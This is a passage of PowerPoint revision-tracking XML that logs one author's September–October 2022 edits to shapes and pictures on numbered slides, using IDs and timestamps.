          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:41:59.870" v="2727" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="33" creationId="{4910BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:42:25.018" v="2767" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="35" creationId="{A06253A4-6E74-7173-EA0E-B69424E6D48D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:43:11.700" v="2781" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="36" creationId="{0FE686CD-89A2-4350-AA34-3CF46AAEC234}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:43:29.854" v="2788" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="38" creationId="{9944F12B-8F65-4E77-377A-6ACD930BCE03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:44:26.517" v="2857" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="40" creationId="{14C08AB2-B977-6B21-6C29-86904DE7B76E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:44:57.627" v="2886" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:spMk id="42" creationId="{24722287-8985-02D1-FAF5-15B984815B22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:43:17.518" v="2785" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="12" creationId="{3063BEAE-B238-4284-27B7-45EC27FD5BAA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:39:04.791" v="2576" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="14" creationId="{E9508BFD-9880-D2AE-0196-7BFCAFD5A787}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:39:12.079" v="2578" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="16" creationId="{AF3CB755-2523-5DBA-2D85-5EEB462DBE3D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:40:06.647" v="2603" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2057539986" sldId="307"/>
            <ac:picMk id="25" creationId="{39A839C5-F671-107C-8B03-B9452D4B625B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:33:20.049" v="2337" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1718002156" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:07:29.858" v="546" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1718002156" sldId="309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20.049" v="2337" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1718002156" sldId="309"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C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3:40.376" v="2341" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="746729536" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:06:29.024" v="490" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="746729536" sldId="310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40.376" v="2341" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="746729536" sldId="310"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C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8:03.234" v="2570" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3172845529" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:13:54.627" v="1096" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3172845529" sldId="311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8:03.234" v="2570" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3172845529" sldId="311"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:33:12.356" v="2336" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="753041370" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:17:12.142" v="1312" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="753041370" sldId="312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33:12.356" v="2336" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="753041370" sldId="312"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:25:16.030" v="1836" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1635383252" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:24:47.558" v="1722" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1635383252" sldId="313"/>
            <ac:spMk id="4" creationId="{0C9609F8-F29B-B7B4-D48D-3D146F22750B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:24:26.089" v="1673" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1635383252" sldId="313"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:25:16.030" v="1836" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1635383252" sldId="313"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:34:41.996" v="2397"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1657834469" sldId="314"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:34:33.324" v="2395" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1657834469" sldId="314"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:35.422" v="3044" actId="120"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3681539690" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:45:26.393" v="2893" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315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CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:10.129" v="2943" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="18" creationId="{AC3552F9-F08F-2CD1-D1F8-4DCDA94E5454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:18.382" v="2956" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="20" creationId="{C56F93D8-C651-33B7-2C26-720ED0B75E72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:20.973" v="2960" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="22" creationId="{729E72B9-9F8E-2DBD-2310-766498BEE14B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:04.079" v="2936" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="27" creationId="{BC28DF3A-48BC-03AF-D3C0-F27298A395E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:33.662" v="2989" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="29" creationId="{53732E87-B718-A3B9-7613-A16877FE2475}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:46.159" v="3017"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="31" creationId="{8935A081-9BEA-3D35-CEC1-429BE839F270}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:35.422" v="3044" actId="120"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="33" creationId="{4910BDE6-D635-72CE-EAFC-B09DDA67F905}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:26.899" v="3042" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:spMk id="35" creationId="{A06253A4-6E74-7173-EA0E-B69424E6D48D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:18.198" v="3023" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="5" creationId="{18B41013-2559-FFDA-7916-6E24FFDC4132}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:46:17.247" v="2897" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="7" creationId="{6B192823-6A69-0A72-DB96-8E50FB89D450}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:46:33.744" v="2900" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="11" creationId="{4D931E3A-CA96-0700-7DEA-5FB2E2BFA7BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:11.180" v="3022" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="12" creationId="{3063BEAE-B238-4284-27B7-45EC27FD5BAA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:46:09.497" v="2896" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="14" creationId="{E9508BFD-9880-D2AE-0196-7BFCAFD5A787}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:48:09.079" v="3021" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="15" creationId="{C4CD3F83-F921-C658-FEBE-35240BF6DAD5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:46:22.091" v="2898" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="16" creationId="{AF3CB755-2523-5DBA-2D85-5EEB462DBE3D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{CD101BA2-0457-4440-A2DF-78C6FF204DF5}" dt="2022-09-13T01:47:59.568" v="3020" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681539690" sldId="315"/>
            <ac:picMk id="25" creationId="{39A839C5-F671-107C-8B03-B9452D4B625B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData clId="Web-{9BA3CF7E-0311-67FB-E1D2-015F4F1506D1}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="" userId="" providerId="" clId="Web-{9BA3CF7E-0311-67FB-E1D2-015F4F1506D1}" dt="2022-10-18T16:39:49.839" v="1" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="" userId="" providerId="" clId="Web-{9BA3CF7E-0311-67FB-E1D2-015F4F1506D1}" dt="2022-10-18T16:39:49.839" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952303437" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="" userId="" providerId="" clId="Web-{9BA3CF7E-0311-67FB-E1D2-015F4F1506D1}" dt="2022-10-18T16:39:49.839" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952303437" sldId="264"/>
            <ac:spMk id="10" creationId="{E53E09A1-5DCA-1C52-EFE5-B7D59C5050A8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd addSection delSection modSection">
      <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T14:39:33.807" v="3667" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:10:21.492" v="323" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952303437" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:10:21.492" v="323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D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-07T10:01:45.292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">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:16:51.287" v="854" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3215868461" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:16:51.287" v="854" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3215868461" sldId="265"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:11:59.207" v="516" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="891638217" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:11:59.207" v="516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addSp delSp modSp mod ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:55:08.704" v="1722" actId="2711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1260607813" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:55:08.704" v="1722" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:36:41.461" v="960" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:36:42.926" v="961" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:spMk id="6" creationId="{B4BF74C5-F98A-105E-7A2D-DF85EA4EFAE4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:45:08.360" v="1098" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1260607813" sldId="277"/>
            <ac:picMk id="1026" creationId="{3329D95F-2DCB-65A1-EC34-A146940BA081}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod ord">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T10:07:23.311" v="2002"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3328257088" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:17:04.779" v="857" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="3" creationId="{AC298E28-5618-F3A3-3FA4-F85D9BECF434}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:18:20.371" v="865" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="6" creationId="{FBBB4F93-FB10-28F1-C861-6D326A4674C9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:16:58.256" v="855" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
            <ac:spMk id="8" creationId="{4863EE52-3554-E225-9E49-68B0F5C4610E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{D2F399E5-3D3E-4AA1-AD0F-FFB6F87043B3}" dt="2022-09-10T09:17:01.462" v="856" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328257088" sldId="278"/>
